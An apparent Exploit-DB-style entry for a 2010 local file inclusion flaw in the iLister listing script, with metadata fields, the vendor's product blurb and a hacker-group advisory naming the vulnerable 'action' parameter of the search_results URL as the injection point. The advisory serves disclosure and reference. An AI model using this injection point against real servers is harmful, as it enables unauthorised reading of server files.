iLister listing script LFi Vulnerability

vendor:

iLister listing script

by:

Sid3^effects aKa HaRi

7,5

CVSS

HIGH

LFi Vulnerability

N/A

CWE

Product Name: iLister listing script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

iLister listing script LFi Vulnerability

iLister listing script is an extremely powerful and flexible multi-language classifieds software. iLister listing script is your best choice in creating a SEO-friendly classifieds ads website for your visitors to sell anything, from cars to houses, to watches, to pets, to software scripts, or to works of art. If you need a powerful business directory script, iLister is the best choice to build a popular business directory. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable server containing the LFI payload. The payload can be sent to the vulnerable parameter 'action' in the URL http://server/search_results/?action=[LFI]

Mitigation:

N/A

Source

Exploit-DB raw data:

1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :    iLister listing script LFi Vulnerability
Date : july 4,2010
Critical Level 	: HIGH
vendor URL :http://www.worksforweb.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description:
iLister listing script is an extremely powerful and flexible multi-language classifieds software. iLister listing script is your best choice in creating a SEO-friendly classifieds ads website for your visitors to sell anything, from cars to houses, to watches, to pets, to software scripts, or to works of art. If you need a powerful business directory script, iLister is the best choice to build a popular business directory. 
#######################################################################################################
Xploit : LFi Vulnerability

http://server/search_results/?action=[LFI]

###############################################################################################################
# 0day no more 
# Sid3^effects